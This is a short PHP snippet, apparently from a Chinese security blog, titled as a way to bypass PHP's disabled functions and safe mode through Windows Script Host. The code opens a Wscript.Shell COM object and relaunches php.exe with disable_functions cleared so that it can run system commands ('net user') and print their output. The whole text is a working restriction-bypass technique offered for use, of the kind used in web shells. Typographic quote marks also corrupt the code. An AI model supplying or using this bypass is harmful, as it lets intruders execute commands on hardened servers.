php利用wsh突破函数禁用执行命令（安全模式同理）

<?php
$cmd=‘net user‘;
$path = ‘C:\\PHP\\php.exe‘;
$cmd=‘-r "system(\‘‘.$cmd.‘\‘);" -d disable_functions = ‘;

//重新定义disable_functions函数
$phpwsh=new COM("Wscript.Shell") or die("Create Wscript.Shell Failed!");
$exec=$phpwsh->exec($path.‘ ‘.$cmd);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo "${stroutput}\n";
?>